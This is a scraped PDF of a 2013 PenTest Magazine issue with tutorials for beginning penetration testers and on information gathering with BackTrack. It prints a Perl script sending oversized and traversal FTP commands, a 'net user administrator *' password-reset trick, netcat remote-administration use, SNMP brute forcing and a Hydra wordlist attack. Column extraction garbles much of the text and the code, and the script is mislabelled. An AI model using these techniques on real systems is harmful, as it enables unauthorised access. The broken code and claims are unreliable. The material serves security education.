PenTest Mag 2013 07

Published on June 2016 | Categories: Documents | Downloads: 50 | Comments: 0 | Views: 861
of 65
Download PDF   Embed   Report

PenTest Mag 2013 07



Cyber Security Auditing Software

Improve your Firewall Auditing
As a penetration tester you have to be an expert in multiple technologies. Typically you are auditing systems installed and maintained by experienced people, often protective of their own methods and technologies. On any particular assessment testers may have to perform an analysis of Windows systems, UNIX systems, web applications, databases, wireless networking and a variety of network protocols and firewall devices. Any security issues identified within those technologies will then have to be explained in a way that both management and system maintainers can understand.
he network scanning phase of a penetration assessment will quickly identify a number of security weaknesses and services running on the scanned systems. This enables a tester to quickly focus on potentially vulnerable systems and services using a variety of tools that are designed to probe and examine them in more detail e.g. web service query tools. However this is only part of the picture and a more thorough analysis of most systems will involve having administrative access in order to examine in detail how they have been configured. In the case of firewalls, switches, routers and other infrastructure devices this could mean manually reviewing the configuration files saved from a wide variety of devices. Although various tools exist that can examine some elements of a configuration, the assessment would typically end up being a largely manual process. Nipper Studio is a tool that enables penetration testers, and non-security professionals, to quickly perform a detailed analysis of network infrastructure devices. Nipper Studio does this by examining the actual configuration of the device, enabling a much more comprehensive and precise audit than a scanner could ever achieve.

With Nipper Studio penetration testers can be experts in every device that the software supports, giving them the ability to identify device, version and configuration specific issues without having to manually reference multiple sources of information. With support for around 100 firewalls, routers, switches and other infrastructure devices, you can speed up the audit process without compromising the detail.

You can customize the audit policy for your customer’s specific requirements (e.g. password policy), audit the device to that policy and then create the report detailing the issues identified. The reports can include device specific mitigation actions and be customized with your own companies styling. Each report can then be saved in a variety of formats for management of the issues. Why not see for yourself, evaluate for free at

Ian has been working with leading global organizations and government agencies to help improve computer security for more than a decade.
He has been accredited by CESG for his security and team leading expertise for over 5 years. In 2009 Ian Whiting founded Titania with the aim of producing security auditing software products that can be used by non-security specialists and provide the detailed analysis that traditionally only an experienced penetration tester could achieve. Today Titania’s products are used in over 40 countries by government and military agencies, financial institutions, telecommunications companies, national infrastructure organizations and auditing companies, to help them secure critical systems.

Dear PenTest Readers,


Editor in Chief: Ewa Duranc [email protected] Managing Editor: Jakub Walczak [email protected] Editorial Advisory Board: Jeff Weaver, Rebecca Wynn, William F. Slater, III Betatesters & Proofreaders: Jackson Bennet, Amit Chugh, Gregory Chrysanthou, Rodrigo Comegno, Dan Dieterle, Pinto Elia, Zbiegniew Fiołna, José Luis Herrera, Antonio James, Duncan Keir, David Kosorok, Gilles Lami, L. Motz, Horace Parks, Jr, Sagar Rahalkar, Michał Rogaczewski, Antonio Domenico Saporita, Robin Schroeder, Jeff Smith, Johan Snyman, Arnoud Tijssen, Tom Updegrove, Jakub Walczak and others Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a PenTest magazine. Senior Consultant/Publisher: Paweł Marciniak CEO: Ewa Dudzic [email protected] Production Director: Andrzej Kuca [email protected] Art Director: Ireneusz Pogroszewski [email protected] DTP: Ireneusz Pogroszewski Publisher: Hakin9 Media 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631 Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes. All rights to trade marks presented in the magazine are reserved by the companies which own them.

ou are probably wondering what will you find in the upcoming issues of the magazine. The free (as you probably already know, since you are reading this) PenTest OPEN, as always, is here to answer this question and show you what can you expect from our future publications. This month, we will go back a bit to the past and give you a glimpse on what can you find in our July release – enormous (150 pages) BackTrack Compendium. We decided to give you an opportunity to take a look at three articles from this issue of PenTest Extra. Davide Peruzzi, OSCP, will bring your attention to the importance of preperation to pentesting. Also, Lance Claghorn will discuss the five common stages of an attack and how to use them for testing. Finally, Mathieu Nayrolles, Mathieu Schmitt, and Benoît Delorme will provide you with a broad guide to using BackTrack for penetration testing. Time for something fresh for the freshmen. Our recently published Starter Kit gives you several tips on how to become a pentesting rock star. In PenTest OPEN we give you two tastes of what you will find in the issue. Chris Berberich guides our young cadets through a properly conducted penetration test and shows how to avoid typical mistakes. On the other hand, Jane Andrew advices how to save the world business by pentesting smartphone. In addition, continuing the smartphone topic, Michael Trofi and Duane Schleen put the limelight on the risks coming out of mobile applications’ vulnerabilities. To finish our journey through the issue, Fadli B. Sidek will instruct you how to evade anti-virus and anti-spam detection. We hope you will enjoy PenTest OPEN and gain much new knowledge. Have a nice read! Jakub Walczak and PenTest Team


The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

OPEN 06/2013






Pivotal Basics for Every Beginner
By Chris Berberich

Mobile Applications: The True Potential 46 Risks ‒ Where to Look for Information When Performing a Pentest on a
by Michael Trofi and Duane Schleen

Pentesting is always very hard at the beginning. People often make really trivial mistakes. Steps and suggestions in this article will help you avoid most of them and conduct a proper pentest. FROM: Starter Kit 03/2013 ‒ Become Well-known Penetester Today

Mobile Application


12Sharpen your Axe with BackTrack
By Davide Peruzzi

This article mainly covers what security professionals should be looking for when performing a penetration test of a mobile application. Although, similar data concerns exist on the Android and Windows 7-based phones, the main discussion here concentrates on data found for iOS applications. FROM: PenTest WebApp 01/2013 ‒ Build Your Own Pentesting Workshop (TO BE RELEASED)

Abraham Lincoln said ‘Give me six hours to chop down a tree and I will spend the first four sharpening the axe.’ This is really the basic concept and the starting point of every penetration test. FROM: PenTest Extra 03/2013 ‒ BackTrack Compendium

Smartphone Pentesting 54Employers: could Save your Business
By Jane Andrew
Are you an owner of a company? If so, you cannot miss this article. It will help you improve your firm security and avoid unneccessary expenses. FROM: Starter Kit 03/2013 ‒ Become Well-known Penetester Today

18Pentesting with Backtrack

By Mathieu Nayrolles, Mathieu Schmitt, and Benoît Delorme

Penetration testing, also known as pentesting, is a technique to evaluate the security of computers and networks by performing imitating attacks from external and internal threats. The pentesting process involves static and dynamic analysis of a system/network in order to reveal potential security issues resulting from improper configurations or hardware/software flaws. These attacks should be executed from the point of view of potential attackers. FROM: PenTest Extra 03/2013 ‒ BackTrack Compendium

Evasion: Bypassing AV Products 60AV and Protection Against It
by Fadli B. Sidek
AV evading techniques are getting better and smarter by the day, and having just an Anti‒Virus and Anti‒Spyware application is insufficient to protect our machines from additional angles of threats. FROM: PenTest Regular 05/2013 (TO BE RELEASED)

Penetration Testing: 40Multiphase Using BackTrack Linux, Metasploit and Armitage
By Lance Cleghorn
The EC Council identifies five stages of attack that are common to cyber penetration. These stages of attack may be used to categorize incidents where a network or a host has been compromised. Considering that these stages are common to real attacks, they are used by ethical hackers to conduct penetration testing. An ethical hacker or a white-hat hacker may use these steps in order, or may selectively choose the steps that work best for the particular vulnerability. FROM: PenTest Extra 03/2013 ‒ BackTrack Compendium

OPEN 06/2013




Pivotal Basics for Every Beginner
Is being a pentester your dream job? Would you like to do pentesting every day until the death but you do not know what to start with? In this article I will describe all you need to begin the journey.

Article comes from Pen Test StraterKit. Download the complete issue.

believe that penetration testing, and any other internet security field, is more of a frame of mind than anything, i.e. thinking outside the box. When a person asks what I do for a living and I tell them I am a pentester, their response is always the same – “What is that and how can I get that title?” I have the same answer every time – a penetration test is a chess match. It is played between the pentester and the contracting organization’s IT department. You start out as a pawn and end up as a queen. That queen must be able to accomplish check-mate in the organization's network infrastructure. There are three different groups of educated pentesters. There is the self-educated, which include people like gamers and those who are simply curious about how to hack a network. Then you have the college educated, who decided to go to school and learn how a network operates and how to secure the network. Lastly, you have the third category, which combines the first two. Neither is better than the other, because to become a well-known pentester, you must be educated in networking, have certifications to prove you can go the extra mile and be up to date with the latest technologies.


Types of Pentesters

A pentester is considered an ethical hacker because there has to be a level of trust between the
OPEN 06/2013 Page

hiring organization and the tester. When I tell people I am a pentester, I usually follow by explaining that I am an ethical hacker. It is confusing because these two roles can seem to conflict with one another. Before becoming a pentester, you have to decide which group of hackers you want to fall under, a white hat, grey hat, black hat hacker, or a script kiddie. The term “hacker” has not always had the negative connotations that it has today. A hacker originally described a person with a desire to learn about and experiment with technology and referred to someone who was technically proficient with whatever systems they hacked. The group under which you portray yourself will determine if you should pursue a career as a pentester. White hats may be security professionals, hired by companies to audit network security or test software. Having access to the same software tools that other hackers use, a white hat seeks to improve the security of a network by attacking a network or application as a black hat hacker would. A black hat hacker is a person who attempts to find network and application security vulnerabilities and exploit them for personal financial gain or other malicious reasons. This differs from white hat hackers, who are security specialists employed to use hacking methods to find security flaws that black hat hackers may exploit.

Black hat hackers can inflict major damage on both individual computer users and large organizations by stealing financial information, compromising the security of systems, or by dropping a network or changing the function of websites and networks. A grey hat is willing to go to the extremes of both black and white hat hackers. Black hats typically indulge to prove a point that is usually supported by white hats. A person's grey "principles" are the very thing that sets them apart from other classified hackers. In most situations, they may not disclose their activities due to legal consequences. It is not out of the question for a grey hat hacker to hack for personal gain, although it is also not unheard of for them to compromise whole systems for the perceived "greater good" either. A script kiddie is a derogatory term used to refer to non-serious hackers who are believed to reject the ethical principles held by professional hackers, which include the pursuit of knowledge, respect for skills, and a motive of self-education. Script kiddies shortcut most hacking methods in order to quickly gain their hacking skills. They will use resources such as YouTube and watch a video of an actual attack performed by a genuine hacker and then try to replicate the attack. They attempt to attack and crack computer networks and vandalize websites. Although they are considered to be inexperienced and undeveloped, script kiddies can impose as much computer damage as skilled hackers. The majority of pentesters fall under the white hat, grey hat, and script kiddie group. You really cannot be a black hat and a pentester because that means you deliberately destroy a network when you perform a pentest. In this industry you will not last long with that mentality. Yes, I put some of the pentesters in the script kiddie group. Over the years, I have looked over other companies' pentest reports and it baffles me how some organizations pass off their reports as serious pentest reports when they are more like a vulnerability assessment. I have seen instances when a company would run a vulnerability scanner and turn those results in as a pentest report. In other cases, I have seen reports delivered by an organization that only ran Metasploit (which is a program that does exploits for you). The problem with these situations, is that, first, these are not examples of penetration tests but rather are just vulnerability assessments. Second, we lose our skills as IT security professionals if we rely solely on GUI interface tools. The only thing you learn from this experience is how to use a GUI interface and how
OPEN 06/2013 Page

to hit the start button. To me, this is a huge problem. I believe that in order to be a well-known pentester, you need to know what is going behind the scenes of that vulnerability scanner and exploits. Ask yourself what is it actually scanning? When I begin a pentest, there is a lot I need to prepare before I even start scanning.

Penetration Testing vs Vulnerability Assessment
Vulnerability Assessment: Typically is general in scope and includes an assessment of the network or a web application, A scan that will identify known network, operating system, web application, and web server vulnerabilities with the use of GUI Interface tools and doing very minimal exploiting, “if any,” Unreliable at times and high rate of false positives. Penetration Testing: Focused in scope and may include targeted attempts to exploit specific vectors, Extremely accurate and reliable, Penetration Testing = vulnerabilities that have been exploited and confirmed. It is impossible to say that a Vulnerability Assessment is better choice than a Penetration Test. Both Vulnerability Assessments and Penetration Tests are a necessity to an organization’s network security. I suggest at a minimum, that you run a vulnerability assessment at least every three months and a full blown Penetration Test once a year. By doing this, you ensure the hardening of your network from hackers.

Testing Phases

Though the methodology used by a pentester may change depending on individual preferences, client contract or employer principles – for the most part all methodologies include the same stages.

Planning and Scoping

The planning and scoping stage occurs when your organization and the client decide what is within the scope and what needs to be excluded from the test. As a pentester, you must be aware of any potential risks associated with the pentest. Before you start the penetration test always get a “get out of jail free card” – this is a signed document

from the organization and yourself. This document should include the scope of the test, URLs, External and Internal IPs to be tested. Also there needs to be some verbiage if the network does go down or there is severe bandwidth issues that interrupts the organizations everyday business continuality from your GUI scanners. Also, it should state that they have everything backed up and cannot go after you for any reason legally. Here is an example of a scope between yourself and the client: to be resourceful and use what is available. For this test let’s use a vulnerability scanner within Kali. You are probably also wondering why you would use a vulnerability scanner when such a tool creates a lot of noise on the network? It is very simple. The job of a penetration tester is to be as thorough as possible, uncovering as many holes as they can find. It is always the penetration tester’s job to verify each vulnerability found before marking it as a positive result and to remove all the false positives. There are hundreds of pages of information in the scan report. I would suggest looking at all of the results. For this case, the one that I am interested in is the vulnerability marked as high, so I am going to click on this one and see what it says. The scanning of found the password ‘anonymous’ within the FTP account. Here is an example of a vulnerability that could be exploited which was found as the result of the vulnerability scanner:
Anonymous FTP

The scope encompassed the internal and external network infrastructure which included routers, servers, and firewalls hosted in the organization’s Cincinnati, Ohio office. The network penetration test was performed from organization’s network in the Cincinnati, Ohio office.
Information gathering
In this phase, the penetration tester will accumulate as much information as possible that will assist with the test. This includes public records, email addresses within the organization, and the organization’s web presence. In the initial stage, web search engines are used to gather as much information about the target organization as possible including target machines on the network. The next step is to find live hosts on the network, which can be achieved through the use of discovery tools such as Nmap. After gathering a list of machines on the network and the open ports, we have to verify that the ports are actually open. The reason for this is that sometimes machines give false results, especially UDP ports. So for example, we identified a machine with a lot of ports open and with an IP address of Let’s do a little reconnaissance on that target.

Synopsis: Disable anonymous FTP access. If it is not needed. Anonymous FTP access can lead to an attacker gaining information about your system that can possibly lead to them gaining access to your system.
Exploitable Risk Factor: Medium (CVSS 7.1) Host:



In this stage, the penetration tester starts to assess all of the options available within the scope of the penetration test. The pentester decides what tools are to be used and the method of the pentest itself. This will include methods such as network scanning, enumeration, and code injection. The goal of reconnaissance is to classify vulnerabilities that the tester will then attempt to exploit in the next phase. There are many vulnerability scanners out there, so which one should I use? Personally, I use several to make sure that there are as few false positives on the vulnerability report itself. As a penetration tester, you have
OPEN 06/2013 Page

Exploiting is the art of taking advantage of known vulnerabilities discovered in the scanning phase. The idea is to gain access to the systems as a hacker would and exploit them. This may include SQL injections, Input Validation, Cross-Site Scripting and Broken Authentication and Session Management. We will be using the username list that we grabbed during the vulnerability assessment phase (I created a file named anonymous.doc with the name “anonymous”), and a copy of the provided wordlist that comes within the applications of Kali. We will also run the SSH module written in Perl, since we already know that the anonymous account is enabled for FTP. Let’s look up the CVE numbers and search Google. CVE-1999-0527 is the CVE number that I found using Google. So to

make sure this isn’t a false positive, let’s go back to the SSH module and re-scan for an anonymous password on the FTP account.
[22][ssh] host: login: anonymous password: anonymous

Privilege escalation

Exploiting a system can result in access to the system with rudimentary privileges. Privilege escalation is the process to gain further access and additional permissions. Learning manual exploits is a key step to becoming a well-known penetration tester and not using a GUI interface tool to do the exploit for you. Automated tools can cause a drop in a network’s bandwidth or drop the network itself. Causing this to happen will give you a bad reputation. While pressing start on a GUI tool, it goes through a lot of unneeded functions like ddos and dos attacks, which are not usually welcomed by your client. It takes a lot of time and practice to
Listing 1. SSH module in Perl
#!/usr/bin/perl $user = "USER anonymous\r\n"; $passw = "PASS [email protected],,,,\r\n"; $command = "CWD "; $dos_input = "."x250; $send = "\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", $socket->recv($serverdata, 1024); print $serverdata; $socket->send($user); $socket->recv($serverdata, 1024); $socket->send($passw); $socket->recv($serverdata, 1024); $socket->send($command.$dos_input.$send); $user = "USER anonymous\r\n"; $passw = "PASS [email protected],,,,\r\n"; $command = "NLST "; $dos_input = "/.../.../.../.../.../"; $send = "\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp",

gain privileges to systems doing manual exploits but it is well worth it. Although exploiting a system results in access, on many instances, that access is limited to an account with only rudimentary permissions. Privilege escalation is the process of using further techniques or exploits to gain further permissions. The more permission gained, the more likely a tester is of achieving access to further systems and confidential data. For this we will run an SSH module written in Perl (Listing 1). As you can see, we successfully exploited the FTP account. So you have your results from the vulnerability scanner(s) and completed a few exploits. Now you have to present to the organization the vulnerabilities and exploits. This is done by writing a complete report. Remember to take screen shots of the exploits so that you have proof of the exploit being completed. This will show the organization that you truly know what you are doPeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", $socket->recv($serverdata, 1024); print $serverdata; $socket->send($user); $socket->recv($serverdata, 1024); $socket->send($passw); $socket->recv($serverdata, 1024); $socket->send($command.$dos_input.$send); $user = "USER anonymous\r\n"; $passw = "PASS [email protected],,,,,\r\n"; $command = "SIZE "; $dos_input = "/.../.../.../.../.../"; $send = "\r\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", $socket->recv($serverdata, 1024); print $serverdata; $socket->send($user); $socket->recv($serverdata, 1024); $socket->send($passw); $socket->recv($serverdata, 1024); $socket->send($command.$dos_input.$send); $socket->exploit successful/r/n”anonymous”

OPEN 06/2013



ing as a pentester, and you will be on your way to becoming a well-known penetration tester. ed with network basics, particularly the OSI model, TCP/IP, handshakes, the different types of packets, and what's contained in the headers. I also suggest getting an understanding of network scanners and web application scanners. There are plenty of organizations out there that have white papers and tutorials regarding networks and web applications (OWASP, SANS, and NIST). Find practice labs so that you can get practice hacking networks. With all this documentation and assistance it is quite simple to become a pentester, but to be a well-known pentester you must not be limited to one technology. You virtually need to know everything when it comes to servers, networks, and vulnerabilities that can be exploited. You need to ensure that you have a thorough understanding of security. Associate yourself with experienced pentesters and join forums and communities that are willing to extend a helping hand. I was once told that the hacking community, in general, is willing to help “newbies” into the hacking community. In general that is a true statement. To be a successful and well-known hacker you will need to understand and be able to write your own scripts and understand program languages. While you are on your way to learn about programming, the main question to ask is which language to learn? This debate has gone for years and there really is no correct answer to it. Each organization for the most part uses one or two languages for their programming so that they can master the language and hire skilled programmers to keep the organization running. As a pentester you should know multiple languages to some degree and understand that language. Python is a good language to start off with because it's efficiently designed, well documented in forums, and moderately kind to beginners. If you get into serious programming, you will have to learn C, the core language of Unix which a pentester should learn or have knowledge of. Perl is worth learning for everyday reasons; it's very widely used for web pages and system administration, so that even if you never write Perl, you should learn to read it. Also, as a penetration tester you must stay up to date on coding, vulnerabilities, and updates to a network. The organization that hired you will expect you to be current in all subjects related to IT security. There is a saying “patch Tuesday, hack Friday” – this basically means when Microsoft patches come out on Tuesday, those pacthes are being hacked Friday. Remember there is brontobytes of information floating around the web. My


This section provides the contracting organization a summary of the results from the vulnerability scanner and exploits that were accomplished during the pentest. The report is broken down into two major sections in order to communicate the objectives, methods, and results of the testing to an executive level and IT staff. The report should be broken down into: The Executive Summary, which would include: Executive Summary of the penetration test, Scope, Background section explaining the overall posture of the organization, and a recommendation Summary. The Technical Report, which would be organized for the IT staff so that they can review and fix the vulnerabilities. This part of the report should include Information Gathering, Vulnerability Assessment, Exploitation/ Vulnerability Confirmation, and the risk of the vulnerabilities to the organization.


Why get certifications? Some of the best hackers do not have certifications, so why should I get them? You do so because you want to become a well-known penetration tester and not just a hacker. To do this, you need to show that your skills are up to date and that you are willing to put in the time to show your employer that you have the skills to do a penetration test. You’re also impressing on your employer that you’re a valued member of the team and that you’re willing to learn. There are many certifications to choose from. A few that stand out are: Certified penetration Testing Engineer (C)PTE, Certified Penetration Testing Consultant C)PTC, GIAC Penetration Tester (GPEN), Certified Ethical Hacker (CEH) and Offensive Security Certified Professional (OSCP). It seems everyone has their own preference in choosing which one is better that the other.


The process of becoming a well-known penetration tester is not going to happen overnight. Being a pentester is my dream job when it comes to IT security. Taking this journey and becoming a wellknown penetration tester involves the pursuit of knowledge whether it is self-taught or through formal education. It is essential to become acquaintOPEN 06/2013

Page 10

suggestion is to join forums, hacking organizations, and read white papers form reliable sources to stay on top of the new technology out there. In conclusion, not everyone will want to become a penetration tester or even know what one is, but within the professional community, there are some key steps to becoming well-known and respected. You must commit to continuing education, don’t be afraid to ask for help, and practice and develop your skills. Bonus Here is some information which is useful but it did not fit into the article well. Key knowledge A penetration test is not a vulnerability scan and a vulnerability scan is not a penetration test, Learn everything you can about operating systems and servers, not just one flavor, Understand the true concepts of TCP/IP, Subnets, and Coding in as many languages as possible, Remember you will not know everything IT related, Google is your best friend. Tip Here is a tip that an old school hacker sent me at one point in time. It works about 60 percent of the time depending on the operating system and what not. As for all exploits, the same percentage could
a d v e r i

go because you are not going to exploit and get root permissions every time you do a pentest due to time restraints within the scope. If you want to hack a computer’s Administrator. If you are logged in to computer with some other account here are the steps: Go to start button click on run Type CMD and press enter A command window will open Type net users This will show you all the users of that computer. Now type net user administrator * and press enter This will ask you to enter a password Enter the password you want to keep for the administrator Re-enter your password to confirm it. DONE

Chris Berberich is a Penetration Tester/Senior Auditor at A-lign Security and Compliance Services based in Tampa, Florida. Chris has an extremely deep and solid understanding of applications, server, and network security. Chris’ focus as a penetration tester was managing corporate Internet infrastructure, systems, and network security – specifically operating systems, web application server, databases, interfacing, and data privacy. Certifications: (C)PEH, (C)PTE. [email protected]
s e m e n t

CHris BerbericH


Sharpen your Axe with BackTrack
Gathering phase
Abraham Lincoln said 'Give me six hours to chop down a tree and I will spend the first four sharpening the axe'. This is really the basic concept and the start point of every penetration test.

Article comes from Pen Test Extra. Download the complete issue.


n a pen test you have to sharpen your axe first by gathering information. The more you obtain, the more surface to attack you will have. The gathering phase isn't the most exciting one, but surely it is the one that will let you make things better and smarter. So what do you need? Let's see. First, you need an adequate system with the right toolkit and a little knowledge of how they work. We will use one of the latest versions of BackTrack (BT) because it is a powerful and widespread operating system, so it will be quite simple to get support or tutorials on the Web: Youtube has a video for almost all the BT tools. The best way to start with BT is virtualization: you can download its virtual machine ready to be started. In addition to virtualization, you can easily start a cheap and smart LAB to perform your tests. If you already have a test network, you can also use the bootable CD. Next you have to be calm and patient, only this way you can collect information and inspect them rightly. You can make your own check-list of tests to do or copy one from the Web, but, when you have your list, you have to follow it meticulously. Remember that you are sharpening. Now you need to write down all the data you collected in order to have everything recorded so that you can analyze it even when you aren't connectOPEN 06/2013

ed to the LAN you have to test. Furthermore you will use these records to make a detailed report for your customer or to roll back in case you mess something up. I use Keepnote to keep track of all my operations and results and Zenmap (Nmap GUI) to map the net, but BT has many more powerful tools than these. Maltego, for example, is awesome.

My friend Netcat

Now let's start to use the father of all tools, the famous 'Swiss-army knife for TCP/IP: Netcat'. Essentially, NC, is a utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less. So why is it so important? When a PC user without experience wants to test if his machine is browsing the Internet, he opens his browser and points to a common address: This is not the best test he could do, he only finds out if he is browsing, but what about if he is not browsing? So the approach must be different. He has to start from a layer closer to the PC, not closer to the user, and investigate the causes, step by step, up to the human layer. You are not an inexperienced person, so you start by opening a command shell and pinging

Page 12

your gateway. Is it responding? If not, check it. Then ping an external IP address (e.g. that is the Google DNS). Is it responding? Alright, you are able to go out of your network. Next you test if your DNS is working by pinging a DNS name like Only if all works fine, you open your browser and test the connection. Also, from the browser you can have a problem (e.g. a misconfigured proxy set in the browser) but, after all the tests you have done previously, you can rule out all lower layers and focus on the current one. That's why NC is so important. It allow you to start from the lowest layer, it is the equivalent of the ping command used in the example, but it has many more applications. Well, open your Terminal window and have a look at the NC help. At the beginning you will use options -l (set NC in listening mode), -v (verbose mode is always better) and -p (set port where NC is listening). Try this: Open two Terminal windows in the same machine. In the first window start a service that listens on a specific port using Netcat (it is called the listener).
nc -lvp 4444

For example, you can try to pass text:
echo 'This text will be transmitted using Netcat' | nc 4444

...and if the listener is as the following, you can also create a file with the text sent:
nc -lvp 4444 > file.txt

You can also try the -c option for remote administration. I suggest you to dig the Internet to search more about Netcat use.

Network hosts identification

As I said, finding information about the target is the base of a successful test. What is the first thing you have to do when you reach a LAN you have to check? Find hosts to use as targets. If you can, create your own hosts individuation scripts using ping and NC or use some of the wonderful tools present in BT. In my opinion, the best are Unicornscan and Nmap, but, since I will shortly explain

If you have a look at the network connection of your BT machine, using the command netstat -nat, you will find a listening connection on port 4444 (tcp LISTEN).
In the second window use NC as a client and connect to localhost on port 4444

nc 4444 -v

Hit enter and you establish a simple connection with NC, but what is this? Essentially, it is a simple chat. If you write something in window 1, it will redirect to windows 2 and vice versa (see Figure 1). So NC is a program that allows you to communicate using TCP or UDP protocols and you can use it whether as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test if a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; otherwise you can use it to redirect text, request html page, and, last but not least, remotely admin a PC. If you have two PCs try to use NC between them or just continue the testing in the same machine (that is the lower layer).
OPEN 06/2013

Figure 1. Netcat simple chat

Figure 2. Netdiscover at work

Page 13

them later, let's explore some other programs with less possibility, but working as well. Start using netdiscover to find live hosts. Using netdiscover -P a network scan is started using common LAN address (the one you are connected to) (see Figure 2). Netdiscover can be also used on another network interface (-i) and IP range (-r). The -P option is useful for a better output. Netdiscover is a continuing scan tool: it scans over and over the net in order to find new hosts and it could be used to implement a very simple intrusion detection system. To stop the scan you have to use [CTRL+C]. In a similar way you can use fping with option -g to analyze a range of IPs. Note that fping uses ICMP protocol, whereas netdiscover uses ARP protocol to locate network hosts – this is a good double check. Don't forget to write down everything and trace all. Particularly start to compile a list of live hosts. You can also try to give a DNS name to the hosts you find using smbscan, but you will notice that the program can find only a few, those with net bios name enable. Let's now try to find something more using DNS discovering. If you are in a domain or if you are scanning for DNS name in the Web, you can try to operate a DNS zone transfer and capture DNS records. When you can perform this operation, you get other sensible information and, maybe, hosts not previously discovered. The DNS transfer zone is a query that synchronizes Primary and Secondary DNS servers but if administrators misconfigure them, everyone can query for transfer and get all DNS records. DNSenum is a tool that tries to make a zone transfer and catch the results. The basic operation is quite simple: you just have to set the domain name to target. Note that you can try the zone transfer both on a local (see Figure 3) or an Internet domain (see Figure 4). You have to notice that a DNS zone transfer, even if successfully done, does not give hackers a direct access to the servers, but gives them many information that can be useful to expand the attack surface. Look at Figure 4; the DNS transfer zone highlights at least 3 attack vectors: webmail, ftp, sftp. It is therefore essential to block all the attacks and scans you can. Also ARP and ICMP scans must be stopped in a protected LAN. Unfortunately this isn't always practicable: in a Microsoft domain, for example, some administrative system tools do not work with restrictive local firewall policies. It is not easy to find balance between security and efficiency. You have done a good hosts analysis and you have a list of IPs alive in the network. Now you can start user account identification.

Figure 3. DNS zone transfer on a local domain using host command

Find your account

Figure 4. DNSenum on a Web domain
OPEN 06/2013

As for the hosts, users discovering can be done using many methods. You can scan Google searching for email accounts of your target company, explore corporate Web pages looking at pdf or word documents and who are the creators of this documents; if you have access to the LAN you are testing, you can try to get information from SNMP or SMTP protocol. Below are some scripts and programs that will help you, present in BT.
Page 14

The harvest, by Edge-Security Research, is a very useful one, you will find it in the folder /pentest/enumeration/theharvest. It searches for a company name in various resources database (Google, Linkedin, PGP, Bing) and can be used to extract probable username. In Figure 5 you can see the result of a research: maybe vdiaz, cdelojo, cmartorella, and xmendez are also FTP, SSH or RDP users. Again by, you can use metagoofil (/pentest/enumeration/google/metagoofil/) to try to find users that create documents, downloadable from the domain you point at, such as docs or pdfs. As well as using Web search to catch company users' names/usernames, you can try to obtain information by SNMP or SMTP. SNMP is a protocol based on UTP that is often used to monitor server service status. The authentication methods (community strings) are passed in clear and often have the default state (public or private), so you can easily try to find it in order to get many information. You can use programs such Snmpenum and Onesixtyone for this. Let's see how they work. Initially you have to use Onesixtyone to enumerate comunity strings; with the info collected before, make a list of hosts and write it down to a file (/ tmp/hosts.txt), then point to pentest/enumeration/snmp/onesixtyone and do the following:
./onesixtyone -c dict.txt -i /tmp/hosts.txt -o / tmp/log.txt

There are many other methods to identify users such as using SMTP server (smtpscan) and try to test the VRFY functionality (smtp-user-enum). Spidering a target website to collect unique words (/ pentest/password/cewl) or sniffing network traffic (Wireshark) can also be useful. In the Backtrack > Information Gathering > Network analysis menu you can find many tools to reach your target. Try to find as many names as you can, but do not forget to add to your list the most common user names (root, admin, administrator).

Map the NET

Let's have a look at network scanners, limiting us to a simple scan, with the only objective to

Figure 5. Maybe we have found some accounts

In this command you use a file dict.txt, already present in the onesixtyone folder, to 'brute force' the community strings; you use the hosts file you have found before to set targets and, at the end, make a log file. In Figure 6 you can find a sample of what you can get. In the sample you see some printers, some switches and a server ( Go on and use snmpenum over setting 'public' as community string, and the windows.txt template (already present) to merge output information (see Figure 7). This is just a sample, but you can get much more information than these using SNMP. You can find processes running, opened ports, system information and much more. For now, limit yourself to the users. What you want is to create a document like hosts.txt but with possible user names.
OPEN 06/2013

Figure 6. Onesixtyone log

Figure 7. Snmpenum at work

Page 15

find some services that can be used as a target. Please, make sure to keep in mind that scanners are much more than what you will read here. Of course, NC can be used as a network scanner, but the best programs are Unicorscan and Nmap so let's start with the first one. The commands in Figure 8 perform a simple scan, pointing at a single target (, testing common TCP (-m T) and UTP (-m U) ports, typically those used by common services such as FTP, SSH, SMB, MySQL. The last command in Figure 8 is a scan of all the subnet 192.168.34.*, but only on FTP, SSH, SMB, and RDP ports. You can perform the same thing using Nmap. The command nmap scans TCP common port; if you add -sU option it will scan UDP ports. The single target can be replaced with 192.168.34.*, or your hosts.txt to explore all subnet or specific IPs; adding the option -p 21-23,3389 you will limit the scan to port 21, 22, 23 and 3389. The result will be probably the same but if you try Nmap you will see more information. In addition, it can be quickly implemented to determinate what kind of program is listening over the port discovered (-sV) and what operating system is installed (-O). Please, take a look at the Nmap help to learn more options and remember that man command or help are always your friends. If you are afraid to use the Terminal, use the Nmap GUI: Zenmap. You have to remember that every GUI is at least one layer over its command-line program; anyway let's use the graphic interface of Nmap and try to find FTP, SSH, Telnet and RDP services in the subnet (Figure 9). Scanners make a list of hosts using FTP, another one of hosts using RDP, and so on. Well done! You have completed your basic network gathering phase, now you can merge all your lists and launch your first attack. What do you need? A username list, a file listing hosts with the specific service, a password list, and a program to put everything together. You don't have the password list, but one can be easily found in the folder /pentest/password/wordlist/ or by a search on the Web. The kind of attack you will do is called 'wordlist attack': it is not the most elegant way to perform a penetration test, but it may be very incisive. The program you can use to join your lists is Hydra (or its GUI xHydra). Figure 10 explains how it works. Open the Hydra GUI (Privilege Escalation > Password Attacks > Online Attacks > Hydra-gtk) and, in the Target tab, insert the target list (e.g. FTP_hosts.txt), the port to test and the protocol (21 / FTP). The options 'Show attempts' and 'Be verbose' are useful to better understand what the program does. Go in the Password tab and insert the user and the password lists; don't forget to check 'try login as password' and 'try empty password'. For a basic test don’t use Tuning and Specific tabs; move to the Start tab and run the attack. It takes a while, but I Hope you can find some user and password association.
Page 16

Get the keys

Figure 8. Some basic scans using Unicornscan

Figure 9. Nmap GUI

Figure 10. An operation diagram of the operation of THCHydra
